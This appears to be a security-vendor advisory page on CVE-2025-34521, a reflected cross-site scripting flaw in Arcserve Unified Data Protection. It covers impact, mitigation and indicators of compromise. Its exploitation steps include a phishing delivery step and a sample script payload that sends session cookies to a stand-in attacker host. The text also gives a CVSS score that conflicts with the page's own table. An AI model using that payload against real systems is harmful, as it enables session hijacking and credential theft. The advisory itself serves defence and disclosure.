CVE-2025-34521
Arcserve Unified Data Protection vulnerability analysis and mitigation

Overview

CVE-2025-34521 is a reflected cross-site scripting (XSS) vulnerability in the web interface of Arcserve Unified Data Protection (UDP). Unsanitized user input is improperly reflected in HTTP responses, enabling remote attackers with low privileges to craft malicious links that execute arbitrary JavaScript in a victim's browser. The vulnerability was published on August 27, 2025, and affects all UDP versions prior to 10.2, including versions 7.x and all 8.0–10.1 releases. It carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Arcserve Advisory).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The vulnerability arises because user-supplied input is reflected directly into HTTP responses without adequate sanitization or output encoding in the UDP web interface. An attacker with low-level authenticated access can craft a malicious URL containing a JavaScript payload; when a victim with an active session clicks the link, the payload executes in their browser within the application's security context. Exploitation requires user interaction (the victim must visit the crafted link) and the attack vector is network-based (Feedly, Arcserve Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser within the context of the Arcserve UDP web application. Primary impacts include session hijacking (stealing session cookies), credential theft, client-side code execution, and potential data exfiltration or manipulation. Availability is not directly impacted, but confidentiality and integrity are both at low risk per the CVSS assessment; the scope is changed, meaning the impact can extend beyond the vulnerable component to the victim's browser environment (Feedly).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.229%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify internet-facing or internally accessible Arcserve UDP web interfaces running versions prior to 10.2 using network scanning or asset inventory tools.
  2. Obtain low-privilege access: Register or obtain a low-privilege account on the target UDP instance, as the vulnerability requires at least low-level authenticated access (PR:L).
  3. Identify the vulnerable parameter: Probe the UDP web interface for input fields or URL parameters that are reflected unsanitized in HTTP responses (e.g., search fields, error messages, or query parameters).
  4. Craft malicious URL: Construct a URL containing a reflected XSS payload in the vulnerable parameter, such as https://<udp-host>/vulnerable-endpoint?param=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  5. Deliver the payload: Send the crafted link to a target user (e.g., an administrator) via phishing email, chat, or other social engineering methods.
  6. Achieve objective: When the victim clicks the link and their browser renders the response, the injected JavaScript executes — enabling session cookie theft, credential harvesting, or further client-side attacks (Feedly).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after accessing the UDP web interface; unusual GET/POST requests to UDP endpoints with encoded JavaScript in URL parameters (e.g., %3Cscript%3E, javascript:, onerror=).
  • Logs: UDP web server access logs showing requests with suspicious query strings containing HTML/JavaScript tags or encoded equivalents; repeated access to the same vulnerable endpoint from different user accounts.
  • Browser/Session: Unexpected session terminations or new sessions originating from unfamiliar IP addresses following a user's interaction with a suspicious link; reports from users of unexpected redirects or pop-ups when using the UDP web interface.

Mitigation and workarounds

Arcserve has released UDP version 10.2, which includes the necessary patches and requires no further action after upgrade. For supported versions 8.0 through 10.1, administrators should apply the vendor-provided patches or upgrade to version 10.2. Versions 7.x and earlier are out of support and must be upgraded to 10.2 to remediate the issue. As interim mitigations, organizations should implement a Content Security Policy (CSP) on the UDP web interface, enforce input validation and output encoding, and educate users to avoid clicking unsolicited links to the UDP portal (Arcserve Advisory).

Community reactions

Coverage of CVE-2025-34521 has been limited to vulnerability aggregation platforms and automated security feeds, with no notable researcher commentary or significant social media discussion identified at this time. Red Hat published a security advisory tracking the CVE, and it was summarized in a CISA weekly vulnerability digest for the week of August 25, 2025 (Red Hat Advisory, RedPacket Security).

Additional resources


SourceThis report was generated using AI

Related Arcserve Unified Data Protection vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2025-34523CRITICAL9.2
  • Arcserve Unified Data Protection logoArcserve Unified Data Protection
  • cpe:2.3:a:arcserve:udp
NoYesAug 27, 2025
CVE-2025-34522CRITICAL9.2
  • Arcserve Unified Data Protection logoArcserve Unified Data Protection
  • cpe:2.3:a:arcserve:udp
NoYesAug 27, 2025
CVE-2025-34520HIGH7.7
  • Arcserve Unified Data Protection logoArcserve Unified Data Protection
  • cpe:2.3:a:arcserve:udp
NoYesAug 27, 2025
CVE-2024-0801HIGH7.5
  • Arcserve Unified Data Protection logoArcserve Unified Data Protection
  • cpe:2.3:a:arcserve:udp
NoNoMar 13, 2024
CVE-2025-34521MEDIUM4.8
  • Arcserve Unified Data Protection logoArcserve Unified Data Protection
  • cpe:2.3:a:arcserve:udp
NoYesAug 27, 2025

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management